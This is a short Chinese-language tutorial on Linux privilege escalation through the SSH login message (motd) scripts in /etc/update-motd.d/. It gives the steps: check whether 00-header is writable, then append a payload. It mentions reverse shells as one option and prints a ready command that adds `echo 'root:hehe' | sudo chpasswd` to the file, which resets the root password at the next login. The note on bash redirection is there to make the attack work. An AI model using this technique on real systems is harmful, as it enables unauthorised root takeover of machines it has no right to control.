linux motd提权
而motd是负责ssh登录后,页面欢迎语 提示语的,用户可以通过配置文件自定义欢迎提示信息。具体配置文件在/etc/update-motd.d/* ,理论上这个目录下的任意文件都可以。通常修改99-header文件即可。
一、检查/etc/update-motd.d/00-header文件权限是否可写
ls -al /etc/update-motd.d/00-header
二、写入提权脚本,这里有两种思路,一种是直接反弹shell,利用python等脚本。另一种是把修改root密码的脚本写入该文件即可
*这里不能用bash -i重定向方式写入反弹shell,重定向符会造成fd number错误
echo “echo ‘root:hehe’ | sudo chpasswd” >> /etc/update-motd.d/00-header